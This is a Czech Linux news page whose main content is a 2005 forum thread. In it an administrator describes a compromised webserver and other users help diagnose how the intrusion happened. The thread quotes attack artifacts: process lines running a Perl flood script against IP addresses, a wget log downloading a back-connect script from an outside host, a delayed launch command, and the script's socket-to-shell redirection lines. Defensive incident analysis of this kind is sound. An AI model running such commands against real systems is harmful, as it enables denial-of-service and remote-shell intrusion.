abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×

dnes 00:22 | Nasazení Linuxu

Společnost Samsung oznámila, že skrze dokovací stanici DeX a aplikaci Linux on Galaxy bude možno na Samsung Galaxy S8 a S8+ a Galaxy Note 8 provozovat Linux. Distribuce nebyly blíže upřesněny.

Phantom Alien | Komentářů: 3
včera 23:55 | Komunita

Společnost Purism na svém blogu oznámila, že její notebooky Librem jsou nově dodávány se zrušeným (neutralized and disabled) Intel Management Engine (ME). Aktualizací corebootu na již prodaných noteboocích lze Management Engine také zrušit. Více v podrobném článku.

Ladislav Hagara | Komentářů: 0
včera 21:44 | Nová verze

Organizace Apache Software Foundation (ASF) na svém blogu slaví páté výročí kancelářského balíku Apache OpenOffice jako jejího Top-Level projektu. Při této příležitosti byl vydán Apache OpenOffice 4.1.4 (AOO 4.1.4). Podrobnosti v poznámkách k vydání. Dlouhé čekání na novou verzi tak skončilo.

Ladislav Hagara | Komentářů: 5
včera 19:22 | Pozvánky

Již příští týden - 26. a 27. října se v Praze v hotelu Olšanka odehraje OpenWRT Summit. Na webu konference naleznete program a možnost zakoupení lístků - ty stojí 55 dolarů. Čtvrtek bude přednáškový a v pátek se budou odehrávat převážně workshopy a meetingy.

Miška | Komentářů: 0
včera 13:44 | Nová verze

Bylo vydáno Ubuntu 17.10 s kódovým názvem Artful Aardvark. Ke stažení jsou Ubuntu Desktop a Server, Ubuntu Cloud Images, Ubuntu Netboot, Kubuntu, Lubuntu a Lubuntu Alternate, Lubuntu Next, Ubuntu Budgie, Ubuntu Kylin, Ubuntu MATE, Ubuntu Studio a Xubuntu. Podrobnosti v poznámkách k vydání.

Ladislav Hagara | Komentářů: 13
včera 13:00 | Komunita

MojeFedora.cz informuje, že Fedora 27 dostane podporu pro AAC. Podpora multimediálních formátů je ve výchozí instalaci Fedory tradičně limitovaná kvůli softwarovým patentům, ale desktopový tým Red Hatu se ji i tak snaží v poslední době co nejvíce rozšířit. Už nějaký čas obsahuje kodeky pro MP3, H.264, AC3 a nyní byl přidán také kodek pro další velmi rozšířený zvukový formát – AAC.

Ladislav Hagara | Komentářů: 2
18.10. 23:55 | Pozvánky

Spolek OpenAlt zve příznivce otevřených technologií a otevřeného přístupu na 145. brněnský sraz, který proběhne v pátek 20. října od 18:00 hodin v restauraci Time Out na adrese Novoměstská 2 v Řečkovicích. Jedná se o poslední sraz před konferencí OpenAlt 2017, jež proběhne o víkendu 4. a 5. listopadu 2017 na FIT VUT v Brně. Běží registrace účastníků.

Ladislav Hagara | Komentářů: 0
18.10. 21:44 | Nová verze

Byla vydána verze 5.2.0 multiplatformního virtualizačního nástroje Oracle VM VirtualBox. Jedná se o první stabilní verzi z nové větve 5.2. Z novinek lze zmínit například možnost exportování VM do Oracle Cloudu, bezobslužnou instalaci hostovaného systému nebo vylepšené GUI. Podrobnosti v seznamu změn. Aktualizována byla také dokumentace.

Ladislav Hagara | Komentářů: 2
18.10. 14:00 | Zajímavý projekt

Byl spuštěn Humble Down Under Bundle. Za vlastní cenu lze koupit multiplatformní hry The Warlock of Firetop Mountain, Screencheat, Hand of Fate a Satellite Reign. Při nadprůměrné platbě (aktuálně 3,63 $) také Hacknet, Hacknet Labyrinths, Crawl a Hurtworld. Při platbě 12 $ a více lze získat navíc Armello.

Ladislav Hagara | Komentářů: 0
18.10. 13:00 | Nová verze

Google Chrome 62 byl prohlášen za stabilní (YouTube). Nejnovější stabilní verze 62.0.3202.62 tohoto webového prohlížeče přináší řadu oprav a vylepšení. Vylepšeny byly také nástroje pro vývojáře (YouTube). Opraveno bylo 35 bezpečnostních chyb.

Ladislav Hagara | Komentářů: 4
Jak se vás potenciálně dotkne trend odstraňování analogového audio konektoru typu 3,5mm jack z „chytrých telefonů“?
 (10%)
 (1%)
 (1%)
 (1%)
 (74%)
 (13%)
Celkem 115 hlasů
 Komentářů: 7, poslední včera 23:06
    Rozcestník

    Dotaz: Průnik do webserveru :(

    29.8.2005 15:12 Rover | skóre: 10
    Průnik do webserveru :(
    Přečteno: 150×
    Zdravím, dneska jsme zaznamenali problém s počtem odeslaných paketů z našeho webserveru. Výpisem procesů jsem zjistil, že se spustili perlovské skritpy, které posílají cca 8000paketů/s na určitou ip adresu na port 80.

    ps ax -vypadal takto:

    sh -c cd /tmp;perl sbyte.t 67.43.159.2 80 99999999999 0 2>&1

    sh -c cd /tmp;perl sbyte.t 72.20.3.74 80 99999999999 16 2>&1

    ... z logů jsem zjistil, že byl tento(a ještě 3 další) nakopírovány z ip 195.213.50.200

    výpis logu apache

    --11:20:39-- http://www.asf.toscana.it/tmp/conback.pl => `conback.pl'

    Resolving www.asf.toscana.it... 159.213.50.200

    Connecting to www.asf.toscana.it[159.213.50.200]:80... connected.

    HTTP request sent, awaiting response... 200 OK Length: 1,100 [text/x-perl]

    OK . 100% 10.49 MB/s

    11:20:39 (10.49 MB/s) - `conback.pl' saved [1100/1100]

    -toto mi příjde, jako stažení pomocí wget. Nic víc jsem z logů nenašel,,, Pomocí ssh se na server nepřihlásil.

    Netušíte, kudy mohl útočník nahrát tyto skripty a hlavně jak je spustil??? Celkem by nám pomotal hlavu, kdyby nechal smazat celý adresář /var/www :(

    Odpovědi

    29.8.2005 16:35 petr_p
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Nicmene pochybuji, ze panum fungoval ten bindshell ;), kdyz v conback.pl maji toto:
    open(STDIN, ">&SOCKET");
    open(STDOUT, ">&SOCKET");
    
    29.8.2005 19:10 Rover | skóre: 10
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Tak koukám, že někdo opravdu už toto viděl a zažil....

    kdybyste chtěli, dám skripty conback.pl a sbyte.t k nahlédnutí...

    --Nejvíce by mě zajímalo, jak to tam dostali a jak to spustili? Ihned jsem aktualizoval Apache i perlové věcičky...
    29.8.2005 19:41 petr_p
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Ne, nezazil ani nevidel (vlaste jednou ano, ale to byl cizi stroj, kde bylo _velmi_ slabe heslo).

    Ten connback.pl jsem vytahnul z URL ve vasem postu. Nicmene sbyte.t by me zajimal. Podle popisu to vypada na DDoS utok.

    Kudy se tam dosali? Na to jste poskytnul malo informaci. Existuji v zasade dve moznosti. Bud vyuzili nejakou chybu typu buffer overflow v nejake webove aplikaci (pak ale ta aplikace musela byt dostatecne znama -- napr. phpBB).

    Nebo a to bych videl jako pravdepodobnejsi, mate chybu ve vasich perlovych skriptech (napr. escapovany shellovy prikaz ve zpetnych apostofech ze vstupu -- BTW, pouzivate tainted modul?). Na to by ukazoval vystup, ktery jste nasel v httpd logu -- stderr vystup vaseho skriptu, ktery spustil wget. Byl to vas skript (apache hlasi nazev skriptu, ktery produkuje chybovy vystup)?
    29.8.2005 20:07 Rover | skóre: 10
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    DoS útok to je na 100% akorát, že náš server byl využit jako hostitelský stroj, ze kterého útok byl páchán.

    Moc se bohužel v typech průniků nevyznám. V logu u toho překopírování nic jiného není. Třeba náznak který skript to byl -opravdu nic. Perlové skripty používám málokdy. Vlastní přístupné z webu nemám, pouze ty komerční (cricket,smokeping...), ale ty počítám že zásadní chybu ve skriptu nemají.

    Z modulů apache používám:

    config_log_module, mime_module, negotiation_module, status_module, includes_module, autoindex_module, dir_module, cgi_module, speling_module, userdir_module, alias_module, rewrite_module, access_module, auth_module, expires_module, unique_id_module, setenvif_module, dav_module, php4_module

    pokuď máte zájem o ten druhý sbyte.t skript, dejte mi mailovku -pošlu Vám to. (teda pokuď to neobrátíte proti mě :) )
    29.8.2005 20:28 petr_p
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Za ten log se omlouvam, ted jsem si to overoval, a apache do error_logu opravdu (defaulne) nepise nazev skriptu, ktery neco vypoti na stderr. Kazdopadne jsem tam videl u vas cas. Podivejte se do access_logu na stejny cas. Najdete te tam vsechny http pozadavky, takze i nazvy skriptu, ktere byly pres HTTP volany.

    Tim tainted modulem jsem myslel perlovsky modul, ktery dokaze hlidat pohyb dat po skriptu a napr. odmine spustit prikaz, ktery pochazi ze vstupu od uzivatele.

    Kazdopadne, pokud nenajdete bezpecnosti chybu, doporucuji uktualizovat veskery sofwtare, ktery je volan z webovych skriptu a stroj po nejakou dobu hlidat. Pripadne napiste spravcovi site, ze ktere jste byl hacknut (pokud na to prijdete), protoze pravdepodobne i on byl kompromitovan.
    29.8.2005 20:45 Rover | skóre: 10
    Rozbalit Rozbalit vše Re: Průnik do webserveru :(
    Do access_logu jsem se už díval a žádný skript v tu dobu se nezpouštěl... to vypadá, že se nedostal přes web server :/ ... dále jsem zjistil z výpisu služeb, že byl spuštěn "časovač" - už si to přesně nepamatuji ale něco jako "sleep 9999999 && perl sbyte.t IP.add.rre.sa 999999999 80 &" to znamená, že se to mohlo spustit o několik hodin později.... a být zapsáno do logu někdy kdysi před pár dny :/

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.